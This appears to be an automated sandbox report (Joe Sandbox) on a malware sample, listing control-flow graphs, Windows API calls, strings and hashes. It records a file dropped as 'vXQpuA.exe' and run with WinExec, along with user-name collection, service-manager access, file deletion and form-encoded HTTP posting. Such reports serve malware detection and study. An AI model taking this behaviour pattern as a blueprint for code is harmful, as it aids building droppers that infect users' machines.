                                                control_flow_graph 585 374044-374074 GetPEB 586 374077-37409a 585->586 587 37409d-3740a0 586->587 588 3740a6-3740bc 587->588 589 3741ee-37422b CreateFileA 587->589 590 374110-374116 588->590 591 3740be-3740c5 588->591 610 374265-374269 589->610 611 37422d-374230 589->611 594 374129-37412f 590->594 595 374118-37411f 590->595 591->590 592 3740c7-3740ce 591->592 592->590 596 3740d0-3740d7 592->596 598 374131-374138 594->598 599 374148-37414e 594->599 595->594 597 374121-374124 595->597 596->590 600 3740d9-3740dd 596->600 602 3741bb-3741c0 597->602 598->599 603 37413a-374141 598->603 604 374167-37416f 599->604 605 374150-374157 599->605 600->590 607 3740df-3740e3 600->607 613 3741c2-3741c5 602->613 614 3741e0-3741e9 602->614 603->599 612 374143-374146 603->612 608 374171-374178 604->608 609 374188-37418e 604->609 605->604 606 374159-374160 605->606 606->604 615 374162-374165 606->615 607->602 616 3740e9-37410b 607->616 608->609 617 37417a-374181 608->617 618 3741a7-3741ad 609->618 619 374190-374197 609->619 620 374232-374238 611->620 612->602 613->614 621 3741c7-3741ca 613->621 614->587 615->602 616->586 617->609 623 374183-374186 617->623 618->602 625 3741af-3741b6 618->625 619->618 624 374199-3741a0 619->624 626 374246-374252 WriteFile 620->626 627 37423a-374242 620->627 621->614 622 3741cc-3741cf 621->622 622->614 628 3741d1-3741d4 622->628 623->602 624->618 630 3741a2-3741a5 624->630 625->602 631 3741b8 625->631 633 374255-374262 FindCloseChangeNotification WinExec 626->633 627->620 632 374244 627->632 628->614 634 3741d6-3741d9 628->634 630->602 631->602 632->633 633->610 634->614 635 3741db-3741de 634->635 635->589 635->614
                                                APIs
                                                • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00374223
                                                • WriteFile.KERNELBASE(00000000,FFFD57E4,00003E00,?,00000000), ref: 00374252
                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00374256
                                                • WinExec.KERNEL32(?,00000005), ref: 00374262
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$ChangeCloseCreateExecFindNotificationWrite
                                                • String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$athA$catA$dleA$el32$lstr$odul$vXQpuA.exe
                                                • API String ID: 2234911746-1821406457
                                                • Opcode ID: 2532cd4db011b8cb9ee9df0a338f0a98687558aa1ab7fc38e3564c7ef64f7ef5
                                                • Instruction ID: abd417404eaacf5b624339f16b685b261bea8c78829bc180fb28b830eff16712
                                                • Opcode Fuzzy Hash: 2532cd4db011b8cb9ee9df0a338f0a98687558aa1ab7fc38e3564c7ef64f7ef5
                                                • Instruction Fuzzy Hash: A8612978D00215DBCF36DF94D884AADBBB4BF54315F66C1AAD409AB601C338AEC1CB95
                                                Function 003219B0 Relevance: 30.4, APIs: 15, Strings: 1, Instructions: 2351processlibrarysleepCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 636 3219b0-321c69 call 35fbd0 call 351f09 call 34cf64 LoadLibraryA * 2 643 324ca2-324cb6 call 349348 636->643 644 321c6f-321c76 636->644 644->643 646 321c7c-321c86 call 31acd0 644->646 650 321daf-321f25 call 315ba0 call 327080 call 325560 call 31b1f0 646->650 651 321c8c-321daa call 35f900 call 360f90 Sleep 646->651 663 321f2a-3220f7 call 34ac10 GetModuleFileNameA call 34ac10 GetUserNameA call 3203e0 call 327220 call 313230 650->663 651->646 674 3222cf-3222e8 call 3279e0 663->674 675 3220fd-32226e call 327220 663->675 682 322f5a-322f96 call 311810 call 3279e0 call 311a20 674->682 683 3222ee-32250b call 311810 call 325560 call 31b1f0 call 35f900 * 3 call 360f90 call 3124d0 674->683 680 322270-32227a 675->680 681 32227c 675->681 684 322286-32228f 680->684 681->684 701 322fb7-322fca 682->701 702 322f98-322fb4 call 311810 call 320a20 682->702 736 322873-3229d9 683->736 737 322511 683->737 688 322291-3222a5 684->688 689 3222ab-3222ca DeleteFileA call 311a20 684->689 688->689 689->674 705 323da3-3244a4 call 311810 call 3271a0 call 327340 call 327400 call 327340 call 311a20 * 4 701->705 706 322fd0-3234e4 call 313ed0 call 325560 call 31c450 call 327080 call 327340 call 327400 call 325560 call 31b1f0 call 311a20 * 2 call 325210 call 35f900 * 2 call 312400 701->706 702->701 774 3244b2 705->774 775 3244a6-3244b0 705->775 814 3234e6-3234f2 706->814 815 3234f8-32365e 706->815 739 3229e7 736->739 740 3229db-3229e5 736->740 742 322513-32251f 737->742 743 322525-32280c 737->743 746 3229f1-3229fa 739->746 740->746 742->736 742->743 744 322812-32282e 743->744 744->744 748 322830-32286e call 311c20 744->748 750 322a16-322a3a call 34a630 746->750 751 3229fc-322a10 746->751 748->736 762 322a48 750->762 763 322a3c-322a46 750->763 751->750 766 322a52-322e35 call 3137b0 call 313560 call 327340 call 327440 call 327340 call 311a20 * 4 call 343c20 call 35f900 * 2 call 312400 762->766 763->766 870 322e43 766->870 871 322e37-322e41 766->871 778 3244bc-3244c5 774->778 775->778 782 3244e1-324505 WinExec 778->782 783 3244c7-3244db 778->783 784 324c71 call 3202c0 782->784 785 32450b-324c0c call 311810 call 3271a0 call 327340 call 327400 call 327340 call 311a20 * 4 782->785 783->782 795 324c76-324c9d call 311a20 * 4 784->795 861 324c1a 785->861 862 324c0e-324c18 785->862 795->643 814->815 819 323d82-323d9e call 311a20 * 3 814->819 820 323660-32366a 815->820 821 32366c 815->821 819->705 826 323676-32367f 820->826 821->826 830 323681-323695 826->830 831 32369b-3236bf call 34a630 826->831 830->831 842 3236c1-3236cb 831->842 843 3236cd 831->843 847 3236d7-323aba call 3137b0 call 313560 call 327340 call 327440 call 327340 call 311a20 * 4 call 343c20 call 35f900 * 2 call 312400 842->847 843->847 914 323ac8 847->914 915 323abc-323ac6 847->915 865 324c24-324c2d 861->865 862->865 868 324c49-324c6f WinExec call 311a20 865->868 869 324c2f-324c43 865->869 868->795 869->868 874 322e4d-322e56 870->874 871->874 877 322e72-322eac 874->877 878 322e58-322e6c 874->878 880 322eba 877->880 881 322eae-322eb8 877->881 878->877 883 322ec4-322ecd 880->883 881->883 885 322ee9-322f21 call 3432c0 883->885 886 322ecf-322ee3 883->886 893 322f42-322f58 call 311a20 * 2 885->893 894 322f23-322f3f call 325560 call 320a20 885->894 886->885 893->701 894->893 916 323ad2-323adb 914->916 915->916 917 323af7-323b31 916->917 918 323add-323af1 916->918 919 323b33-323b3d 917->919 920 323b3f 917->920 918->917 921 323b49-323b52 919->921 920->921 922 323b54-323b68 921->922 923 323b6e-323ba6 call 3432c0 921->923 922->923 926 323d77-323d7d call 311a20 923->926 927 323bac-323bf2 923->927 926->819 929 323c00 927->929 930 323bf4-323bfe 927->930 931 323c0a-323c13 929->931 930->931 932 323c15-323c29 931->932 933 323c2f-323d71 ShellExecuteA 931->933 932->933 933->926
                                                APIs
                                                  • Part of subcall function 00351F09: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00351F1C
                                                  • Part of subcall function 00351F09: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00351F4D
                                                • LoadLibraryA.KERNELBASE(?), ref: 00321B22
                                                • LoadLibraryA.KERNELBASE(?), ref: 00321C61
                                                • __aulldiv.LIBCMT ref: 00321D80
                                                • Sleep.KERNEL32(?,?,?,?,?,?,?,0000003D,00000000,00000006,00000000), ref: 00321DA4
                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00321F51
                                                • GetUserNameA.ADVAPI32(?,00000104), ref: 00321F85
                                                • DeleteFileA.KERNEL32(?), ref: 003222BE
                                                • operator!=.LIBCPMTD ref: 003222DB
                                                • __aulldiv.LIBCMT ref: 003224C2
                                                • operator!=.LIBCPMTD ref: 00322F74
                                                  • Part of subcall function 00320A20: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,8CDA9266), ref: 00320A6F
                                                  • Part of subcall function 00320A20: DeleteFileA.KERNEL32(?), ref: 00320BAE
                                                • _strstr.LIBCMT ref: 003236B5
                                                  • Part of subcall function 00313560: __aulldiv.LIBCMT ref: 003136F6
                                                  • Part of subcall function 00343C20: GetProcAddress.KERNEL32(00323A15,?), ref: 00343F74
                                                • _strstr.LIBCMT ref: 00322A30
                                                  • Part of subcall function 00313560: SHGetFolderPathA.SHELL32(00000000,00000000), ref: 003135F6
                                                  • Part of subcall function 00343C20: GetProcAddress.KERNEL32(00323A15,?), ref: 00343D7D
                                                  • Part of subcall function 00312400: __aulldiv.LIBCMT ref: 00312482
                                                • ShellExecuteA.SHELL32(00000000,?,?,00000000,00000000,00000001), ref: 00323D71
                                                • WinExec.KERNEL32(?,00000000), ref: 003244F6
                                                • WinExec.KERNEL32(?,00000000), ref: 00324C5E
                                                  • Part of subcall function 003202C0: StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 003203C2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File__aulldiv$AddressDeleteExecLibraryLoadNameProcTime_strstroperator!=$CtrlDispatcherExecuteFolderManagerModuleOpenPathServiceShellSleepStartSystemUnothrow_t@std@@@User__ehfuncinfo$??2@
                                                • String ID: 0.8
                                                • API String ID: 2325502147-4163865904
                                                • Opcode ID: e49e422e5495216eb3aea5b7e603d10148a43d01c0e5cf8172f59e3e68147697
                                                • Instruction ID: a0d9ee9bcb45a718b5bc7ba1c6572bbf163cd43fbbd3747d3aa1f6a5a805c048
                                                • Opcode Fuzzy Hash: e49e422e5495216eb3aea5b7e603d10148a43d01c0e5cf8172f59e3e68147697
                                                • Instruction Fuzzy Hash: 18630474D096A88ADB66CF289C81BEABBB1AF59305F0481D9D94C77211EB306FC5CF41
                                                Function 0031B1F0 Relevance: 8.0, APIs: 2, Strings: 2, Instructions: 1031COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 934 31b1f0-31b3fc call 35f900 * 2 call 312400 call 35f900 call 360f90 946 31b402 934->946 947 31c3f8-31c42f call 311810 call 311a20 * 2 934->947 948 31b404-31b410 946->948 949 31b416-31b446 946->949 970 31c432-31c44f call 349348 947->970 948->947 948->949 954 31b736-31b776 949->954 955 31b44c-31b456 call 34cf43 949->955 957 31b784 954->957 958 31b778-31b782 954->958 966 31b458-31b45c 955->966 967 31b45d-31b45f 955->967 961 31b78e-31b797 957->961 958->961 964 31b7b3-31b958 call 311390 call 3133d0 call 327080 call 34cf43 961->964 965 31b799-31b7ad 961->965 992 31b95a-31b95e 964->992 993 31b95f-31b961 964->993 965->964 966->967 968 31b461-31b472 call 34ac10 967->968 969 31b474-31b4c6 967->969 973 31b4cd-31b4ed call 34cf43 968->973 969->973 983 31b4f4-31b4f6 973->983 984 31b4ef-31b4f3 973->984 986 31b514-31b51e call 34cf43 983->986 987 31b4f8-31b50a 983->987 984->983 994 31b520-31b524 986->994 995 31b525-31b527 986->995 987->986 992->993 996 31b963-31b975 993->996 997 31b97f-31b9ca call 312120 call 311ac0 call 349554 993->997 994->995 998 31b529-31b53a call 34ac10 995->998 999 31b53c-31b58e 995->999 996->997 1014 31b9f5 997->1014 1015 31b9cc-31b9f3 call 34ac10 call 33d8c0 997->1015 1001 31b595-31b63d call 35f900 * 2 call 312400 998->1001 999->1001 1019 31b64b 1001->1019 1020 31b63f-31b649 1001->1020 1018 31b9ff-31bf65 call 327080 call 35f900 * 2 call 312400 call 35f900 call 360f90 call 324ef0 call 325560 call 327340 call 33f8b0 1014->1018 1015->1018 1055 31bf6a-31bf83 call 311a20 call 34cf43 1018->1055 1023 31b655-31b65e 1019->1023 1020->1023 1026 31b660-31b674 1023->1026 1027 31b67a-31b6ba call 34cf43 1023->1027 1026->1027 1033 31b6c1-31b6c3 1027->1033 1034 31b6bc-31b6c0 1027->1034 1036 31b6c5-31b6d6 call 34ac10 1033->1036 1037 31b6d8-31b72a 1033->1037 1034->1033 1040 31b731 1036->1040 1037->1040 1060 31bf85-31bf89 1055->1060 1061 31bf8a-31bf8c 1055->1061 1060->1061 1062 31bfa1-31bff3 1061->1062 1063 31bf8e-31bf9f call 34ac10 1061->1063 1065 31bffa-31c00a 1062->1065 1063->1065 1067 31c010-31c053 call 325560 1065->1067 1068 31c339-31c343 call 34cf43 1065->1068 1076 31c059-31c079 call 34cf43 1067->1076 1077 31c28b-31c29b 1067->1077 1074 31c345-31c349 1068->1074 1075 31c34a-31c34c 1068->1075 1074->1075 1078 31c361-31c3b3 1075->1078 1079 31c34e-31c35f call 34ac10 1075->1079 1092 31c080-31c082 1076->1092 1093 31c07b-31c07f 1076->1093 1082 31c2a1-31c325 call 311750 call 311a20 * 7 1077->1082 1083 31c32a-31c334 call 311a20 1077->1083 1081 31c3ba-31c3f3 call 311a20 * 4 1078->1081 1079->1081 1081->947 1082->970 1083->1068 1096 31c0a0-31c0aa call 34cf43 1092->1096 1097 31c084-31c096 1092->1097 1093->1092 1104 31c0b1-31c0b3 1096->1104 1105 31c0ac-31c0b0 1096->1105 1097->1096 1108 31c0b5-31c0c6 call 34ac10 1104->1108 1109 31c0c8-31c11a 1104->1109 1105->1104 1113 31c121-31c1cc call 35f900 * 2 call 312400 1108->1113 1109->1113 1130 31c1da 1113->1130 1131 31c1ce-31c1d8 1113->1131 1133 31c1e4-31c1ed 1130->1133 1131->1133 1134 31c209-31c25f call 34cf43 1133->1134 1135 31c1ef-31c203 1133->1135 1138 31c261-31c265 1134->1138 1139 31c266-31c268 1134->1139 1135->1134 1138->1139 1140 31c286 1139->1140 1141 31c26a-31c27c 1139->1141 1141->1140
                                                APIs
                                                  • Part of subcall function 00312400: __aulldiv.LIBCMT ref: 00312482
                                                • __aulldiv.LIBCMT ref: 0031B3B4
                                                Strings
                                                • Content-Type: application/x-www-form-urlencoded, xrefs: 0031BEF2
                                                • Qp, xrefs: 0031BAF3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldiv
                                                • String ID: Content-Type: application/x-www-form-urlencoded$Qp
                                                • API String ID: 3732870572-783608910
                                                • Opcode ID: f18a0cd755e0487fbc386c7556f65a87850eb3e7d891d90aa589ea98749862be
                                                • Instruction ID: 291d42a614003686dea98be07eb5b190f1b82b2620bfcd680a005130f3f8442b
                                                • Opcode Fuzzy Hash: f18a0cd755e0487fbc386c7556f65a87850eb3e7d891d90aa589ea98749862be
                                                • Instruction Fuzzy Hash: 5FB27970D042688FDB2ACB28CC55BDABBB1AF99300F1482E9D449AB391DB715EC5CF51
                                                Function 0031ACD0 Relevance: .3, Instructions: 257COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1201 31acd0-31ae27 call 311810 call 31aa00 1206 31ae2d-31af58 call 311810 call 31aa00 1201->1206 1207 31b1ce 1201->1207 1206->1207 1215 31af5e-31b086 call 311810 call 31aa00 1206->1215 1209 31b1d8-31b1ee call 349348 1207->1209 1215->1207 1220 31b08c-31b1c0 call 311810 call 31aa00 1215->1220 1220->1207 1225 31b1c2-31b1cc 1220->1225 1225->1209
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldiv
                                                • String ID:
                                                • API String ID: 3732870572-0
                                                • Opcode ID: af115597d67c0fa28530e33544ee416cf2613e421effbe0be079812d8e112749
                                                • Instruction ID: b0d4010a6ea01d4c7c28f0ba188c83c42359c75900173cef6257f0a5c0d3da5e
                                                • Opcode Fuzzy Hash: af115597d67c0fa28530e33544ee416cf2613e421effbe0be079812d8e112749
                                                • Instruction Fuzzy Hash: 7FE1F774D096AC8ADB26CFA889817DDFBB0AF59304F1481D9D98877316EB301AC9CF51
                                                Function 00312010 Relevance: .0, Instructions: 31COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c12fb5006e198a9469d627416917a4438922f797b5ff49e9074cd4f9e6f192e5
                                                • Instruction ID: 85883dd56be9a54824db09db2762d62e07ec5e9b61f43fc013f6d1f26cdfa613
                                                • Opcode Fuzzy Hash: c12fb5006e198a9469d627416917a4438922f797b5ff49e9074cd4f9e6f192e5
                                                • Instruction Fuzzy Hash: 3AF05476914548BBCB05DF54DC41FCAB7ACE70D760F40C629F9198B680E735A6448B90
                                                Function 0031AA00 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 206COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                • E), xrefs: 0031AB4B
                                                • Content-Type: application/x-www-form-urlencoded, xrefs: 0031ABE8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldiv
                                                • String ID: Content-Type: application/x-www-form-urlencoded$E)
                                                • API String ID: 3732870572-2424320723
                                                • Opcode ID: 142aa23adf31cf4ada87871414e04b9efc8353b9d297009582b0d48bb91997e7
                                                • Instruction ID: eddc518011a883e7b55698945f45c48b2bb5b895599d5864520e482730f47154
                                                • Opcode Fuzzy Hash: 142aa23adf31cf4ada87871414e04b9efc8353b9d297009582b0d48bb91997e7
                                                • Instruction Fuzzy Hash: C79147B1E002189FDB15DFA8C885BDEBBB5FF89310F148169E409AB381DB746A45CF91
                                                Function 003548DF Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1183 3548df-3548eb 1184 35491d-354928 call 350cb8 1183->1184 1185 3548ed-3548ef 1183->1185 1192 35492a-35492c 1184->1192 1187 3548f1-3548f2 1185->1187 1188 354908-354919 RtlAllocateHeap 1185->1188 1187->1188 1189 3548f4-3548fb call 353454 1188->1189 1190 35491b 1188->1190 1189->1184 1195 3548fd-354906 call 352295 1189->1195 1190->1192 1195->1184 1195->1188
                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000000,00000000,?,?,0034956E,00000000,?,00311FF9,00000000,?,00311F08), ref: 00354911
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 41d43cdcf65520c95f2cbcc6182021f558ec918a6a1c832914da6505007781c1
                                                • Instruction ID: e8d2504268dac068e1bc0997a0a72b8496f1fd4aeb7b34948cc74e3b35407617
                                                • Opcode Fuzzy Hash: 41d43cdcf65520c95f2cbcc6182021f558ec918a6a1c832914da6505007781c1
                                                • Instruction Fuzzy Hash: DCE022316007206AD62B2B269D02F9B774C9F823BFF570221EC09DA1B1DB60DD8CC6E0
                                                Function 00351FE9 Relevance: 1.5, APIs: 1, Instructions: 11COMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1198 351fe9-351ffc call 3543f6 1200 352001-352003 1198->1200
                                                APIs
                                                • _free.LIBCMT ref: 00351FFC
                                                  • Part of subcall function 003543F6: RtlFreeHeap.NTDLL(00000000,00000000,?,00358B3C,?,00000000,?,?,?,00358B63,?,00000007,?,?,00358F65,?), ref: 0035440C
                                                  • Part of subcall function 003543F6: GetLastError.KERNEL32(?,?,00358B3C,?,00000000,?,?,?,00358B63,?,00000007,?,?,00358F65,?,?), ref: 0035441E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorFreeHeapLast_free
                                                • String ID:
                                                • API String ID: 1353095263-0
                                                • Opcode ID: 10e095cde31c31e70ec97b2935984fa0773950bb2f406251cda1964e0a531419
                                                • Instruction ID: 2be38ae87c5008254568eefbb09543d4005014bdd2839bc7b6402433e3a9738c
                                                • Opcode Fuzzy Hash: 10e095cde31c31e70ec97b2935984fa0773950bb2f406251cda1964e0a531419
                                                • Instruction Fuzzy Hash: 32C08C31000208BBCB05DB45C806E4E7BA8DB80368F200054F8001B260CBB1EE449680

                                                Non-executed Functions

                                                Function 00342740 Relevance: 37.3, APIs: 10, Strings: 11, Instructions: 546librarymemoryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,8CDA9266), ref: 003429E3
                                                • GetProcAddress.KERNEL32(?,?), ref: 003429FD
                                                • GetModuleHandleA.KERNEL32(?,8CDA9266), ref: 00342CE4
                                                • GetProcAddress.KERNEL32(?,?), ref: 00342CFE
                                                • GetModuleHandleA.KERNEL32(?,8CDA9266), ref: 00342FE5
                                                • GetProcAddress.KERNEL32(?,?), ref: 00342FFF
                                                • lstrlenA.KERNEL32(00000000,12we3fwe,8CDA9266), ref: 0034320C
                                                • GetProcessHeap.KERNEL32(00000008,-00000001,12we3fwe,8CDA9266), ref: 0034323E
                                                • HeapAlloc.KERNEL32(00000000), ref: 00343245
                                                • lstrcpynA.KERNEL32(00000000,00000000,00000000), ref: 00343266
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressHandleModuleProc$Heap$AllocProcesslstrcpynlstrlen
